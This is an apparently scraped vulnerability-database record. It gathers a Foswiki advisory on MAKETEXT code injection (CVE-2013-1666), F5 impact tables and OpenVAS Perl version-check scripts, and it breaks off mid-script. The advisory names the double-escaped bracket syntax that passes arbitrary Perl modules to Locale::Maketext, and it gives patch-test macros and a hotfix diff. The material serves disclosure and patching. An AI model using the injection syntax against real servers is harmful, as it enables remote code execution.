"bulletinFamily": "software", "cvelist": ["CVE-2012-6330", "CVE-2013-1666", "CVE-2012-6329"], "description": "\r\n\r\n---+ Security Alert: Code injection vulnerability in MAKETEXT macro\r\n\r\nThis advisory alerts you of a potential security issue with your Foswiki\r\ninstallation. A vulnerability has been reported against the core Perl\r\nmodule CPAN:Locale::Maketext [1], which Foswiki uses to provide\r\ntranslations when {UserInterfaceInternationalization} is enabled in the\r\nconfiguration. Because of this vulnerability it may be possible for a\r\nuser to invoke arbitrary perl modules on the server through a crafted \r\nmacro.\r\n\r\nThe original fix for this issue reported in\r\n[[SecurityAlert-CVE-2012-6329]] [2] failed to eliminate one possible\r\nattack vector. This CVE applies an additional fix for the original issue.\r\n\r\nThe system is *not vulnerable* if ={UserInerfaceInternationalization}= \r\nis not enabled in your configuration, or if =Locale::Maketext= has been\r\nupgraded to version 1.23 as advised in [[SecurityAlert-CVE-2012-6329]] [2].\r\n\r\n---++ Severity Level\r\n\r\nSeverity 1 issue: The web server can be compromised.\r\n\r\nThe severity level was assigned by the Foswiki\r\nCommunity.SecurityTaskTeam [3] as documented in\r\nDevelopment.SecurityAlertProcess [4]\r\n\r\n---++ Vulnerable Software Versions\r\n\r\nAll releases of Foswiki.\r\n * Foswiki-1.0.0 to Foswiki-1.0.10\r\n * Foswiki-1.1.0 to Foswiki-1.1.7\r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name\r\nCVE-2013-1666 [5] to this vulnerability.\r\n\r\n---++ Attack Vectors\r\n\r\nEditing wiki pages and HTTP POST requests towards a Foswiki server with\r\nenabled localization (typically port 80/TCP). Typically, prior\r\nauthentication is necessary. If your wiki allows commenting by users\r\nwithout first logging in, then it may be possible for such an anonymous\r\nuser to exploit this vulnerability.\r\n\r\nThe original report ( [[SecurityAlert-CVE-2012-6329]] [2]) against\r\nLocale::Maketext also identified another vector, where a module name can\r\nbe passed in to Locale::Maketext through the bracket notation. At the\r\ntime we determined that Foswiki was not vulnerable to this vector, as\r\nFoswiki does not permit that syntax to be used. __This was incorrect__.\r\nIt is possible to pass bypass the checks by double-escaping the brackets.\r\n\r\n---++ Impact\r\n\r\nArbitrary code execution on the server as the webserver user.\r\n\r\n---++ Details\r\n\r\nA crafted %MAKETEXT{}% macro can cause multiple issues: This CVE\r\naddresses an additional vector:\r\n * NEW *Execute arbitrary perl modules by escaping brackets within\r\nMAKETEXT =~~[Some::Module,~~]= (CVE-2013-1666)*\r\n * Execute arbitrary code on the server by passing unsanitized strings\r\nto Locale::Maketext. (CVE-2012-6329)\r\n * Consume memory and swap space resulting in potential lockup or\r\ncrash due to %MAKETEXT{}% not validating the parameter numbers supplied\r\nin the =[_nnn]= tokens. (CVE-2012-6330)\r\n * Cause an exception within Foswiki, also due to invalid parameters\r\nin =[_nnn]= tokens\r\n\r\n\r\n---++ Countermeasures\r\n\r\nApply one of these countermeasures:\r\n * Apply hotfix (see patch below).\r\n * Install Extensions.PatchItem12391Contrib [6]\r\n * Disable ={UserInerfaceInternationalization}= in your =!LocalSite.cfg=\r\n * Upgrade to Foswiki-1.1.8 once available.\r\n\r\nIn addition to the above, Locale::Maketext should be upgraded to version\r\n1.23.\r\n\r\nYou can verify that the patches are successful by using the following\r\ntwo lines in a test topic:\r\n\r\n * If a warning about MAKETEXT Rejected is displayed here, your system\r\nis patched for Item12285: %MAKETEXT{"[_101]"}%\r\n * If ==[quant,4,singular,plural]== is displayed at the end of this\r\nline, your system is patched for Item12391: <tt>%MAKETEXT{"\r\n~~[quant,4,singular,plural~~] "}%</tt>\r\n\r\nNote: If the 2nd line displays =~[quant,4,singular,plural~]= (shows the\r\n~ character) then your system is not patched, but is not vulnerable\r\nbecause Internationalization is disabled.\r\n\r\n---++ Authors and Credits\r\n\r\n * John Lightsey for disclosing the issue to the foswiki-security list.\r\n * CrawfordCurrie, PaulHarvey and GeorgeClark for contributing to the\r\nfix, the 1.1.8 release and advisory.\r\n * Members of the Foswiki security team for discussions and for\r\nediting this security advice.\r\n\r\n---++ Hotfix for Foswiki Production Release 1.1.0-1.1.7\r\n\r\nThe line numbers may vary between releases, but the two regular\r\nexpressions should be changed as shown below:\r\n\r\n=================( CUT )================\r\n--- lib/Foswiki/Macros/MAKETEXT.pm 2013-02-13 10:26:42.520780283 -0500\r\n+++ lib/Foswiki/Macros/MAKETEXT.pm 2013-02-13 10:26:51.362682708 -0500\r\n@@ -25,8 +25,8 @@\r\n $str =~ s/\]/~]/g;\r\n\r\n # restore already escaped stuff:\r\n- $str =~ s/~~\[/~[/g;\r\n- $str =~ s/~~\]/~]/g;\r\n+ $str =~ s/~~+\[/~[/g;\r\n+ $str =~ s/~~+\]/~]/g;\r\n\r\n $max = 0;\r\n $min = 1;\r\n\r\n=================( CUT )================\r\n\r\n---++ Hotfix for Foswiki Production Release 1.0.0-1.0.10\r\n\r\nApply the above patch to Foswiki.pm, in the vicinity of line 4193\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2013-02-12 - User discloses issue to foswiki security mailing list\r\n(John Lightsey)\r\n * 2013-02-13 - Developer verifies issue (George Clark)\r\n * 2013-02-13 - Security team triage the issue (George Clark, Crawford\r\nCurrie, Paul Harvey)\r\n * 2013-02-13 - Developer fixes code (George Clark)\r\n * 2013-02-14 - Security team creates advisory with hotfix (George Clark)\r\n * 2013-xx-xx - Release Manager builds patch release (name)\r\n * 2013-02-14 - Send alert to foswiki-announce and foswiki-discuss\r\nmailing lists (George Clark)\r\n * 2013-02-19 - Publish advisory in Support web and update all related\r\ntopics (George Clark)\r\n * 2013-02-19 - Reference to public advisory on Download page and\r\nKnown Issues (George Clark)\r\n * 2013-02-19 - Issue a public security advisory (vuln@secunia.com,\r\ncert@cert.org, bugs@securitytracker.com bugtraq@securityfocus.com\r\nfull-disclosure@lists.grok.org.uk) (name)\r\n\r\n---++ External Links\r\n\r\n[1] http://search.cpan.org/perldoc?Locale::Maketext\r\n[2] http://foswiki.org/Support/SecurityAlert-CVE-2012-6329\r\n[3] http://foswiki.org/Community/SecurityTaskTeam\r\n[4] http://foswiki.org/Development/SecurityAlertProcess\r\n[5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1666\r\n[6] http://foswiki.org/Extensions/PatchItem12391Contrib\r\n", "edition": 1, "modified": "2013-02-24T00:00:00", "published": "2013-02-24T00:00:00", "id": "SECURITYVULNS:DOC:29097", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29097", "title": "Foswiki Security: Alert CVE-2013-1666 - Remote Code Execution Vulnerability in MAKETEXT macro.", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:49", "bulletinFamily": "software", "cvelist": ["CVE-2012-4991", "CVE-2012-6330", "CVE-2012-6329", "CVE-2012-5469"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2012-12-18T00:00:00", "published": "2012-12-18T00:00:00", "id": "SECURITYVULNS:VULN:12791", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12791", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-1758", "CVE-2013-1759", "CVE-2013-1466", "CVE-2013-0162", "CVE-2013-1666", "CVE-2012-6329", "CVE-2013-1362", "CVE-2013-1636"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2013-02-24T00:00:00", "published": "2013-02-24T00:00:00", "id": "SECURITYVULNS:VULN:12910", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12910", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2019-04-30T18:21:05", "bulletinFamily": "software", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "\nF5 Product Development has assigned ID 416734 (BIG-IP), ID 474513 (BIG-IQ), and ID 474518 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP AAM| 11.4.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP AFM| 11.3.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP Analytics| 11.0.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP APM| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP ASM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Perl binary and library \nBIG-IP GTM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP Link Controller| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP PEM| 11.3.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| None| Perl binary and library \nBIG-IP DNS| None| 12.0.0 - 12.1.2| None \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None| Perl binary and library \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None| Perl binary and library \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| None| Perl binary and library \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Perl binary and library \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Perl binary and library \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Perl binary and library \nBIG-IQ ADC| 4.5.0| None| Perl binary and library \nBIG-IQ Centralized Management| 5.0.0 - 5.1.0 \n4.6.0| None| Perl binary and library \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Perl binary and library \nF5 iWorkflow| 2.0.0 - 2.0.2| 2.1.0| Perl binary and library\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability, you should permit access to the system over a secure network and limit command line access to trusted users. For more information about securing access to the system, refer to [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-04-26T22:14:00", "published": "2014-11-25T21:29:00", "id": "F5:K15867", "href": "https://support.f5.com/csp/article/K15867", "title": "Perl vulnerabilities CVE-2012-5195, CVE-2012-5526, CVE-2012-6329, and CVE-2013-1667", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:18", "bulletinFamily": "software", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the system over a secure network and limit command line access to trusted users. For more information about securing access to the system, refer to SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-09-01T00:00:00", "published": "2014-11-25T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15867.html", "id": "SOL15867", "title": "SOL15867 - Perl vulnerabilities CVE-2012-5195, CVE-2012-5526, CVE-2012-6329, and CVE-2013-1667", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-12-04T11:17:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "Check for the Version of perl", "modified": "2017-12-01T00:00:00", "published": "2014-02-11T00:00:00", "id": "OPENVAS:841704", "href": "http://plugins.openvas.org/nasl.php?oid=841704", "type": "openvas", "title": "Ubuntu Update for perl USN-2099-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2099_1.nasl 7957 2017-12-01 06:40:08Z santu $\n#\n# Ubuntu Update for perl USN-2099-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(841704);\n script_version(\"$Revision: 7957 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:40:08 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-11 10:44:48 +0530 (Tue, 11 Feb 2014)\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for perl USN-2099-1\");\n\n tag_insight = \"It was discovered that Perl's Locale::Maketext module\nincorrectly handled backslashes and fully qualified method names. An attacker\ncould possibly use this flaw to execute arbitrary code when an application used\nuntrusted templates.\";\n\n tag_affected = \"perl on Ubuntu 12.10 ,\n Ubuntu 12.04 LTS ,\n Ubuntu 10.04 LTS\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"USN\", value: \"2099-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-2099-1/\");\n script_summary(\"Check for the Version of perl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"perl-modules\", ver:\"5.14.2-6ubuntu2.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"perl-modules\", ver:\"5.10.1-8ubuntu2.4\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"perl-modules\", ver:\"5.14.2-13ubuntu0.3\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-01-31T00:00:00", "id": "OPENVAS:1361412562310865275", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865275", "type": "openvas", "title": "Fedora Update for perl FEDORA-2013-0659", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl FEDORA-2013-0659\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"perl on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097811.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865275\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:25:13 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-0659\");\n script_name(\"Fedora Update for perl FEDORA-2013-0659\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.16.2~237.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "Gentoo Linux Local Security Checks GLSA 201410-02", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121275", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121275", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201410-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201410-02.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121275\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:55 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201410-02\");\n script_tag(name:\"insight\", value:\"Two vulnerabilities have been reported in the Locale-Maketext module for Perl, which can be exploited by malicious users to compromise an application using the module.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201410-02\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201410-02\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"perl-core/Locale-Maketext\", unaffected: make_list(\"ge 1.230.0\"), vulnerable: make_list(\"lt 1.230.0\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/perl\", unaffected: make_list(\"ge 5.17.7\"), vulnerable: make_list(\"lt 5.17.7\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-02-22T00:00:00", "id": "OPENVAS:1361412562310865373", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865373", "type": "openvas", "title": "Fedora Update for perl FEDORA-2013-1836", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl FEDORA-2013-1836\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098991.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865373\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 09:59:33 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2013-1836\");\n script_name(\"Fedora Update for perl FEDORA-2013-1836\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"perl on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.14.3~221.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-23T19:06:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "The host is installed with Strawberry Perl and is prone to multiple code\n injection vulnerabilities.", "modified": "2020-04-21T00:00:00", "published": "2013-01-24T00:00:00", "id": "OPENVAS:1361412562310803162", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803162", "type": "openvas", "title": "Strawberry Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Strawberry Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803162\");\n script_version(\"2020-04-21T11:03:03+0000\");\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56852);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 